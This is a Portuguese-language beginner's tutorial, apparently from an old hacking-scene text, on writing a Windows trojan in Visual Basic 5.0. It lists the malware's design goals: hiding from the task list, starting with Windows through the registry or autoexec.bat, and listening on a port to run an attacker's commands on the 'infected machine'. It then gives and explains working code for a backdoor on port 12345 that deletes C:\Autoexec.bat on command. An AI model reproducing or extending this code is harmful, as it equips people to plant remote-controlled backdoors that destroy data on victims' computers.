Basico De Trojans

TROJANS

Tópicos

00. O quê é um trojan?

01. O quê é preciso para criar um trojan?

02. Qual linguagem de programação utilizaremos?

03. Começando a programar

04. Exemplo básico de um trojan em Visual Basic

05. Palavras finais



00. O quê é um trojan?



Trojan é uma abreviatura de Trojan Horse (Cavalo de Tróia).

Tem esse nome pela semelhança com o cavalo de madeira usado

pelos troianos pra invadir a base de seus inimigos.

Vendo pelo lado da informática, é um programa que ouve em

uma porta do seu sistema e aguarda comandos de um cliente.



01. O quê é preciso para criar um trojan?



Um conhecimento bom em programação em qualquer linguagem.

Aconselho o uso de Delphi e Visual Basic p/ escrita de trojans

p/ Windows e C, Assembly ou LKM p/ escrita de trojans p/ Linux.



02. Qual linguagem de programação utilizaremos?



Visual Basic 5.0.



03. Começando a programar



Pra começar a programar você precisa saber umas coisas básicas.

Aqui vão elas:



* Conhecer bem uma linguagem de programação, aqui, no caso do

tutorial a utilizada é o Visual Basic 5.0 da Micro$oft.

* O trojan deve ficar oculto na lista de tarefas do Windows

(ctrl alt del)

* O trojan deve ouvir em uma porta TCP ou UDP e aguardar comandos.

* O trojan deve interpretar os comandos recebidos pelo cliente

e os executar na máquina infectada(servidor).

* O trojan deve se auto iniciar junto com o Windows, para isso você

pode usar uma chave no registro do Windows, autoexec.bat, win.ini

ou qualquer outro meio desde que o servidor se inicie com o Windows.



04. Exemplo básico de um trojan em Visual Basic



Crie um projeto no Visual Basic e adicione a Winsock no formulário

(Ctrl + T e marque a Microsoft Winsock Control 5.0)

Dê dois cliques no ícone da winsock na toolbox p/ adiciona-la

ao nosso formulário.

Dê dois cliques no formulário p/ entrarmos na Code Window

Pronto... estamos na Code Window. É aqui que faremos o nosso trojan.

Escreva isso:



Private Sub Form_Load()

Winsock1.LocalPort = "12345"

Winsock1.Listen

End Sub



Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)

Winsock1.Close

Winsock1.Accept requestID

End Sub



Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

Dim recebido As String

Winsock1.GetData recebido

If recebido = "deletar_autoexec" Then

Kill "C:\Autoexec.bat"

End If

End Sub



Explicando o código:



Winsock1.LocalPort = "12345"

* Configura a Winsock p/ ficar na porta 12345



Winsock1.Listen

* Coloca a Winsock em estado de espera(ouvindo) na porta 12345



Dim recebido As String

* Declara a variável "recebido" como String



Winsock1.GetData recebido

* Informa a Winsock que a variável "recebido" irá guardar

* todas as strings recebidas(enviadas pelo cliente)



If recebido = "deletar_autoexec" Then

Kill "C:\Autoexec.bat"

End If

* Esse código diz que se a variável "recebido" receber a string

"deletar_autoexec" o arquivo C:\Autoexec.bat será deletado.